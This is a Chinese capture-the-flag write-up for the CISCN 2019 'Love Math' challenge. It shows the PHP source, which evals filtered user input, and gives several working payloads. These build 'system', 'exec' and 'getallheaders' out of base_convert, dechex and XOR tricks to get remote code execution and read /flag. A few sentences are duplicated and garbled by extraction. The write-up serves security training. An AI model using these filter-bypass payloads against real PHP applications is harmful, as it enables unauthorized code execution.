# NSS [CISCN 2019初赛]Love Math
开题直接给源码
<?php
error_reporting(0);
//听说你很喜欢数学,不知道你是否爱它胜过爱flag
if(!isset($_GET['c'])){
show_source(__FILE__);
}else{
//例子 c=20-1
$content = $_GET['c'];
if (strlen($content) >= 80) {
die("太长了不会算");
}
$blacklist = [' ', '\t', '\r', '\n','\'', '"', '`', '\[', '\]'];
foreach ($blacklist as $blackitem) {
if (preg_match('/' . $blackitem . '/m', $content)) {
die("请不要输入奇奇怪怪的字符");
}
}
//常用数学函数http://www.w3school.com.cn/php/php_ref_math.asp
$whitelist = ['abs', 'acos', 'acosh', 'asin', 'asinh', 'atan2', 'atan', 'atanh', 'base_convert', 'bindec', 'ceil', 'cos', 'cosh', 'decbin', 'dechex', 'decoct', 'deg2rad', 'exp', 'expm1', 'floor', 'fmod', 'getrandmax', 'hexdec', 'hypot', 'is_finite', 'is_infinite', 'is_nan', 'lcg_value', 'log10', 'log1p', 'log', 'max', 'min', 'mt_getrandmax', 'mt_rand', 'mt_srand', 'octdec', 'pi', 'pow', 'rad2deg', 'rand', 'round', 'sin', 'sinh', 'sqrt', 'srand', 'tan', 'tanh'];
preg_match_all('/[a-zA-Z_\x7f-\xff][a-zA-Z_0-9\x7f-\xff]*/', $content, $used_funcs);
foreach ($used_funcs[0] as $func) {
if (!in_array($func, $whitelist)) {
die("请不要输入奇奇怪怪的函数");
}
}
//帮你算出答案
eval('echo '.$content.';'); //最后变为eval('echo tac /flag;');
}
代码分析:
foreach():用来遍历一个数组
preg_match_all():搜索content中所有匹配给定正则表达式的匹配结果并且将它们输出到used_funcs中.
preg_match_all('/[a-zA-Z_\x7f-\xff][a-zA-Z_0-9\x7f-\xff]*/', $content, $used_funcs); 这行代码使用正则表达式匹配数学表达式中的函数名,并将匹配的结果存储在 $used_funcs 数组中。
dechex():将10进制转成16进制。
hexdec():将16进制转成10进制。
base_convert():base_convert(1001,2,10)是将二进制的1001转换为10进制的9。
简单扫一遍代码,我们是从最后一句的 c o n t e n t 下手进行 R C E , content下手进行RCE, content下手进行RCE,content是我们get方法传参进来的c。
c o n t e n t 要求长度小于 80 ,不能包含 content要求长度小于80,不能包含 content要求长度小于80,不能包含blacklist中的字符。可以使用的:白名单中的数学函数,.,^等
方法一:动态调用函数
什么是动态调用函数?就是下面代码会执行会执行 system(‘ls’);
$a='system';
$a('ls');
如果我们想构造一个$_GET[pi]
首先中括号被禁用我们可以用花括号代替,变成$_GET{pi}
GET可以用base_convert()进制转换,把十进制163983转成62进制获得,但是_却无法获得。此路不通
PHP中有将16进制转成字符串的函数hex2bin(),十六进制5f474554转字符串就是_GET
那么我们hex2bin(5f474554)就能得到_GET,但是代码过滤a-zA-Z所以我们加一步十进制转十六进制。
hex2bin(dechex(1598506324))就能得到_GET。
那么hex2bin怎么获得呢?
利用base_convert()将十进制37907361743转化为36进制,得到hex2bin。 //动态函数调用。
所以_GET=hex2bin(5f474554)=hex2bin(dechex(1598506324))=base_convert(37907361743,10,36)(dechex(1598506324))
payload:
?c=$pi=base_convert(37907361743,10,36)(dechex(1598506324));$$pi{pi}($$pi{abs})&pi=system&abs=cat /flag
方法二:利用getallheaders()函数
base_convert(696468,10,36)
//exec
$pi(8768397090111664438,10,30)
//getallheaders
$pi=base_convert,$pi(696468,10,36)($pi(8768397090111664438,10,30)(){1})
//exec(getallheaders(){1})
payload:
?c=$pi=base_convert,$pi(696468,10,36)($pi(8768397090111664438,10,30)(){1})
1=tac /flag
方法三:直接cat /flag
payload:
($pi=base_convert)(22950,23,34)($pi(76478043844,9,34)(dechex(109270211257898)))
//exec('hex2bin(dechex(109270211257898))')
//exec('cat f*')
base_convert(1751504350,10,36)(base_convert(15941,10,36).(dechex(16)^asinh^pi))
//system('cat'.dechex(16)^asinh^pi)
//system('cat *')
此外
还有一种payload:【可以细细研究一下】
?c=$pi=(is_nan^(6).(4)).(tan^(1).(5));$pi=$$pi;$pi{0}($pi{1})&0=system&1=cat%20/flag
总结一下:
利用 进制转换函数或者异或 构造字符串从而进行RCE。这题还是很巧妙的。